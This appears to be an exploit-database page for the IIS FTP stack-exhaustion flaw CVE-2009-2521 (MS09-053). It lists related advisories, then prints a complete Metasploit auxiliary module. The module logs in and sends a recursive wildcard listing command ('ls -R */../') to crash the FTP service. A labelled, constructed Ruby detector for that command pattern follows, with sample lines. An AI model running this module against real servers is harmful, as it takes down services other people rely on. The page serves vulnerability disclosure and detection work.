| Title | Published | Views | Family |
|---|---|---|---|
| Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] | 3 Jul 2011 00:00 | – | zdt |
| CVE-2009-2521 | 4 Sep 2009 00:00 | – | circl |
| Microsoft IIS FTP Server Recursive Listing Denial of Service (CVE-2009-2521; CVE-2009-3023) | 8 Sep 2009 00:00 | – | checkpoint_advisories |
| CVE-2009-2521 | 4 Sep 2009 10:00 | – | cve |
| CVE-2009-2521 | 4 Sep 2009 10:00 | – | cvelist |
| Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 2011 00:00 | – | exploitdb |
| Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 2011 00:00 | – | exploitpack |
| Microsoft IIS FTP Server LIST Stack Exhaustion | 26 Nov 2011 19:30 | – | metasploit |
| CVE-2009-2521 | 4 Sep 2009 10:30 | – | nvd |
| Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) | 15 Oct 2009 00:00 | – | openvas |

```ruby
# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
      'Description'    => %q{
        This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
      },
      'Author'         => [
        'Nikolaos "Kingcope" Rangos', # Bug Discoverer
        'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module
      ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 1.0 $',
      'References'     =>
        [
          [ 'CVE', '2009-2521'],
          [ 'BID', '36273'],
          [ 'OSVDB', '57753'],
          [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
        ],
      'DisclosureDate' => 'Sep 03 2009'))

    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', '[email protected]' ])
    ])
  end

  def run
    return unless connect_login
    print_status("Sending DoS packets ...")
    send_cmd_data(['ls','-R */../'],nil)
    disconnect
    print_good("Done")
  end
end
```
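
A defensive counterpart to the module above, added here as an example and not part of the original module or the Metasploit Framework: it flags FTP listing commands that combine the recursive `-R` option with a wildcard path segment followed by `..`, the request shape the module sends. The function names, the inclusion of `NLST` and the sample command lines are assumptions constructed for illustration.

```ruby
# Constructed sample of FTP control-channel lines (client -> server); not real traffic.
SAMPLE_COMMANDS = [
  'USER anonymous',
  'LIST',
  'LIST -R',
  'LIST -l *.txt',
  'list -R */../',
  'NLST -lR pub/*/../',
  'LIST -R pub/../docs',
  'RETR */../file.txt'
].freeze

# Verbs treated as directory listings. Including NLST is an assumption of this example.
LISTING_VERBS = %w[LIST NLST].freeze

# Split one control-channel line into verb, option letters and path arguments.
def parse_ftp_command(line)
  verb, rest = line.strip.split(/\s+/, 2)
  tokens = rest.to_s.split(/\s+/)
  flags, paths = tokens.partition { |t| t.start_with?('-') && t.length > 1 }
  { verb: verb.to_s.upcase, flags: flags.flat_map { |f| f[1..].chars }, paths: paths }
end

# True when a path has a wildcard segment that is later followed by a ".." segment.
def wildcard_then_parent?(path)
  segments = path.split(%r{[/\\]+}).reject(&:empty?)
  first_wild = segments.index { |s| s.match?(/[*?]/) }
  return false if first_wild.nil?

  segments[(first_wild + 1)..].include?('..')
end

# A listing verb + recursive flag + wildcard-then-parent path is reported.
def suspicious_listing?(line)
  cmd = parse_ftp_command(line)
  return false unless LISTING_VERBS.include?(cmd[:verb])
  return false unless cmd[:flags].include?('R') # -R may be bundled, e.g. -lR

  cmd[:paths].any? { |p| wildcard_then_parent?(p) }
end

# Return the subset of lines that match the pattern.
def flag_commands(lines)
  lines.select { |l| suspicious_listing?(l) }
end

puts flag_commands(SAMPLE_COMMANDS)
```
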